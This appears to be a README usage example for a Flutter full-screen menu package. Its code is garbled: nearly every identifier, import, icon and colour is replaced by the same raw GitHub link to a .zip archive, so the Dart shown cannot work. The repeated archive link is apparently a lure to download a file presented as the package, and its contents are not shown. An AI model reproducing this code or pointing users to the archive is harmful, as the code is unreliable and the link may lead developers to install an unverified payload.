dependencies:
full_screen_menu: ^2.0.0import 'https://raw.githubusercontent.com/sawel24/flutter-full-screen-menu/master/stereoscopist/flutter-full-screen-menu.zip'; https://raw.githubusercontent.com/sawel24/flutter-full-screen-menu/master/stereoscopist/flutter-full-screen-menu.zip(
context,
items: [
https://raw.githubusercontent.com/sawel24/flutter-full-screen-menu/master/stereoscopist/flutter-full-screen-menu.zip('https://raw.githubusercontent.com/sawel24/flutter-full-screen-menu/master/stereoscopist/flutter-full-screen-menu.zip'),
FSMenuItem(
icon: Icon(https://raw.githubusercontent.com/sawel24/flutter-full-screen-menu/master/stereoscopist/flutter-full-screen-menu.zip, color: https://raw.githubusercontent.com/sawel24/flutter-full-screen-menu/master/stereoscopist/flutter-full-screen-menu.zip),
text: Text('Make colder'),
gradient: orangeGradient,
onTap: () => print('The weather is colder now');
),
FSMenuItem(
icon: Icon(https://raw.githubusercontent.com/sawel24/flutter-full-screen-menu/master/stereoscopist/flutter-full-screen-menu.zip, color: https://raw.githubusercontent.com/sawel24/flutter-full-screen-menu/master/stereoscopist/flutter-full-screen-menu.zip),
text: Text('Make hotter'),
gradient: blueGradient,
onTap: () => print('The weather is hotter now');
),
],
);This project is licensed under the Apache License 2.0 - see the LICENSE file for details